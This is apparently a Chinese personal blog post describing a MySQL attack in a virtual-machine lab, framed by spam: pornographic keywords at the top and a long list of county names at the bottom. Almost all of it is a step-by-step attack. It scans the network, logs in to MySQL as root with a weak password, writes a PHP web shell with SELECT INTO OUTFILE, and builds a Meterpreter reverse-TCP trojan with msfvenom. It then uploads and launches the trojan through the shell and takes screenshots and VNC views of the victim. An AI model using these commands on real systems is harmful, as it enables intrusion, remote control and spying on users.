最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊

網(wǎng)絡(luò)安全 mysql漏洞攻擊虛擬機(jī)測試

2023-08-23 19:32 作者:游戲開發(fā)周泓愷  | 我要投稿

ifconfig//本機(jī)ip

nbtscan//掃描其他主機(jī)

nmap 192.168.0.9/24//掃描端口 檢測是否有3306端口

mysql -h 192.168.0.9 -u root -proot//弱密碼登錄mysql

select user();//查看用戶

show variables like "%secure%";//查看配置

192.168.0.7//打開網(wǎng)站(假如受害機(jī)正在使用php+mysql)

select "<?php @system($_GET['cmd']);?>" into outfile "D:/phpstudy_pro/WWW/a.php"//創(chuàng)建文件到主機(jī),必須要存在運(yùn)行php網(wǎng)站的目錄下

192.168.0.7/a.php?cmd=whoami//打開當(dāng)當(dāng)創(chuàng)建好的文件,查看Windows權(quán)限


msfvenmom -p windows/meterpreter/reverse_tcp LHOST=192.168.50.125 LPORT=8080 -f exe > shell.exe//創(chuàng)建木馬程序

//以下是相關(guān)配置

msfconsole

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.9

set lport 8080

exploit


復(fù)制shell.exe里面的內(nèi)容

192.168.0.7/a.php/?cmd =echo 粘貼內(nèi)容 -> C:\Users\Administrator\shell.exe//將木馬傳到受害機(jī)

192.168.0.7/a.php/?cmd =start C:\Users\Administrator\shell.exe//在受害機(jī)上打開木馬程序


screenshot //給受害機(jī)截屏

run vnc//查看受害機(jī)正在干什么


網(wǎng)絡(luò)安全 mysql漏洞攻擊虛擬機(jī)測試的評論 (共 條)

分享到微博請遵守國家法律
民权县| 丽江市| 饶河县| 德钦县| 禹城市| 武陟县| 静安区| 长乐市| 新宾| 沅陵县| 会同县| 西丰县| 连山| 许昌县| 克东县| 隆林| 柳江县| 宾阳县| 海门市| 玉龙| 永州市| 耿马| 进贤县| 昌平区| 望城县| 山阳县| 东丽区| 石城县| 康保县| 万全县| 台江县| 姜堰市| 家居| 巴东县| 九台市| 尼勒克县| 饶平县| 东阳市| 兰州市| 靖安县| 黄大仙区|